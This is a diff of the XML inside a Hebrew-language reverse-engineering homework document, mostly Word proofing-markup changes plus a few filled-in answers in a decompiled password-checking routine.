           <w:lang w:val="en-US" w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>____________</w:t>
+        <w:t>y == hash</w:t>
       </w:r>
       <w:r>
         <w:rPr>

--- a/hw3/hw3_dry/HW3-Dry.docx
+++ b/hw3/hw3_dry/HW3-Dry.docx
@@ -453,8 +453,18 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> טאוב</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>טאוב</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
@@ -469,8 +479,18 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> בשביל להגיע להרצאה באת"מ</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> בשביל להגיע להרצאה </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>באת"מ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
@@ -535,6 +555,7 @@
         </w:rPr>
         <w:t xml:space="preserve">. בתוך הדיסק-און-אי נמצא קובץ ההרצה </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -542,13 +563,32 @@
         </w:rPr>
         <w:t>verySecretProgram</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (המוצרף לכם לתרגיל). מטרתכם בתרגיל בית זה היא לפענח מה אותה תוכנה מסתורית עושה.</w:t>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>המוצרף</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> לכם לתרגיל). מטרתכם בתרגיל בית זה היא לפענח מה אותה תוכנה מסתורית עושה.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -558,13 +598,31 @@
         </w:rPr>
         <w:t xml:space="preserve"> מומלץ להיעזר בכלים עליהם למדנו בקורס (</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>objdump, readelf</w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>objdump</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>readelf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -608,6 +666,7 @@
         </w:rPr>
         <w:t xml:space="preserve">שימו לב: שני חלקי התרגיל מבוססים על אותו קובץ </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -615,6 +674,7 @@
         </w:rPr>
         <w:t>verySecretProgram</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -694,8 +754,17 @@
           <w:rStyle w:val="Strong"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>Reverse Engenering</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Reverse </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Engenering</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -805,14 +874,34 @@
         </w:rPr>
         <w:t xml:space="preserve">לאחר הרצת </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>readelf -h verySecretProgram</w:t>
-      </w:r>
+        <w:t>readelf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -h </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>verySecretProgram</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi" w:hint="cs"/>
@@ -934,14 +1023,34 @@
         </w:rPr>
         <w:t xml:space="preserve">לאחר הרצת </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>readelf -h verySecretProgram</w:t>
-      </w:r>
+        <w:t>readelf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -h </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>verySecretProgram</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi" w:hint="cs"/>
@@ -1952,7 +2061,22 @@
           <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>000000000939f103</w:t>
+        <w:t>0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>939f103</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2104,6 +2228,7 @@
         </w:rPr>
         <w:t>ב-</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -2111,6 +2236,7 @@
         </w:rPr>
         <w:t>Decompiler</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -2133,8 +2259,18 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> אך לרוע מזלכם חלקים מן התוכנית לא הצליחו להשתחזר</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> אך לרוע מזלכם חלקים מן התוכנית לא הצליחו </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>להשתחזר</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -2290,7 +2426,41 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> checkPasswordAux(char* s){</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>checkPasswordAux</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>char* s){</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2350,6 +2520,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2370,6 +2541,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2398,6 +2570,7 @@
         </w:rPr>
         <w:t>     </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2428,6 +2601,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2494,8 +2668,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> c = *s;</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> c = *</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>s;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2574,6 +2760,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2594,6 +2781,7 @@
         </w:rPr>
         <w:t>){</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2642,6 +2830,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2662,6 +2851,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2746,8 +2936,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(c){</w:t>
-      </w:r>
+        <w:t>(c</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>){</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2794,7 +2996,18 @@
           <w:szCs w:val="21"/>
           <w:lang w:val="en-US" w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> &amp; 1</w:t>
+        <w:t xml:space="preserve"> &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>1</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2806,6 +3019,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2884,6 +3098,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2904,6 +3119,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2958,8 +3174,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>          s++;</w:t>
-      </w:r>
+        <w:t>          s+</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>+;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3054,8 +3282,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> sum;</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>sum;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3140,7 +3380,41 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> checkPassword(char* s){</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>checkPassword</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>char* s){</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3178,8 +3452,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>char* copy = s;</w:t>
-      </w:r>
+        <w:t xml:space="preserve">char* copy = </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>s;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3226,7 +3512,29 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(checkPasswordAux(s) &gt;</w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>checkPasswordAux</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>(s) &gt;</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3238,6 +3546,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3258,6 +3567,7 @@
         </w:rPr>
         <w:t>){</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3316,6 +3626,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3336,6 +3647,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3390,8 +3702,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>     s = copy;</w:t>
-      </w:r>
+        <w:t xml:space="preserve">     s = </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>copy;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3440,6 +3764,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> y = </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3460,6 +3785,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3488,6 +3814,7 @@
         </w:rPr>
         <w:t>     </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3508,6 +3835,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3624,7 +3952,18 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>'a'</w:t>
+        <w:t>'a</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>'</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3636,6 +3975,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3664,6 +4004,7 @@
         </w:rPr>
         <w:t>         </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3682,7 +4023,18 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(x</w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>x</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3792,6 +4144,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3812,6 +4165,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3888,6 +4242,7 @@
         </w:rPr>
         <w:t>         </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3906,7 +4261,18 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(y &gt;</w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>y &gt;</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3996,6 +4362,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4016,6 +4383,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4100,7 +4468,18 @@
           <w:szCs w:val="21"/>
           <w:lang w:val="en-US" w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> 26y + *s</w:t>
+        <w:t xml:space="preserve"> 26y + </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>x</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4112,6 +4491,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4138,8 +4518,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>         s++;</w:t>
-      </w:r>
+        <w:t>         s+</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>+;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
